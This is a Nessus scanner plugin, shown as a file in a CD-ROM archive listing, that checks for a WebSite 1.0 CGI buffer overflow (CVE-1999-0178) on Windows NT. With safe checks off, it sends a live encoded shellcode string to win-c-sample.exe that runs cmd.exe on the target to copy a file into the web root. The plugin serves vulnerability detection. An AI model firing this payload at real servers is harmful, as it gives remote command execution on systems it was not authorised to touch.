home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / WebSite.nasl

< prev

next >

Wrap

Text File  |  2005-01-14  |  3KB  |  103 lines

---

1. #
2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
3. # 
4. #
5. # See the Nessus Scripts License for details
6. #
7.  
8. if(description)
9. {
10.  script_id(10008);
11.  script_bugtraq_id(2078);
12.  script_version ("$Revision: 1.22 $");
13.  script_cve_id("CVE-1999-0178");
14. # Name :
15.  script_name(english:"WebSite 1.0 buffer overflow",
16.           francais:"WebSite 1.0 : dΘpassement de buffer");
17.  
18. # Description :
19.   script_description(
20.           english:string("There is a buffer overflow in some 
21.         WebSite 1.0 CGI scripts which allow a remote intruder 
22.         to execute any command on the remote host.
23.  
24.         Platform affected : WindowsNT
25.         
26.         Solution : Upgrade to the latest version, or contact 
27.         your vendor for a patch.
28.         
29.         Risk factor : High"),
30.  
31.         francais:string("Dans certains cgi WebSite 1.0, un dΘpassement de buffer permet α un intrus d'executer n'importe quelle commande sur le serveur cible.\n
32. SystΦme affectΘ : WindowsNT\nFacteur de risque : ElevΘ"));
33.  
34.  
35.  
36. # Copyright :
37.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
38.            francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
39.  
40. # Summary :
41.   script_summary(english:"WebSite 1.0 CGI arbitrary code execution",
42.            francais:"Execute du code arbitraire sur la machine distante");
43.          
44. # Family
45.   script_family(english:"Remote file access",
46.           francais:"AccΦs aux fichiers distants");
47.         
48.  script_category(ACT_MIXED_ATTACK); # mixed
49.  script_dependencie("find_service.nes", "no404.nasl");
50.  script_require_ports("Services/www", 80);
51.  exit();
52. }
53.  
54. ##########################
55. #             #
56. # The actual script code # 
57. #             #
58. ##########################
59.  
60. include("http_func.inc");
61. include("http_keepalive.inc");
62. port = get_http_port(default:80);
63.  
64.  
65. if(safe_checks())
66. {
67.  res = is_cgi_installed_ka(item:"/cgi-shl/win-c-sample.exe", port:port);
68.  if(res)
69.  {
70.   alrt = "
71. There may be buffer overflow in the remote cgi win-c-sample.exe.
72. An attacker may use this flaw to execute arbitrary commands
73. on this host.
74.  
75. *** Nessus reports this vulnerability using only
76. *** information that was gathered. Use caution
77. *** when testing without safe checks enabled.
78.  
79. Solution : delete it
80. Risk factor : High";
81.  
82.   security_hole(port:port, data:alrt);
83.  }
84.  exit(0);
85. }
86.  
87.  
88. command = "/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\\y[X%050PzPA9%01u%F0%83%E9%10%FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\x1.htm";
89.  
90. res = is_cgi_installed_ka(item:"x1.htm", port:port);
91. if(!res)
92. {
93.  is_cgi_installed_ka(item:command, port:port);
94.  res = is_cgi_installed_ka(item:"x1.htm", port:port);
95.  if(res)security_hole(port);
96. }
97.  
98.  
99.  
100.  
101.  
102.           
103.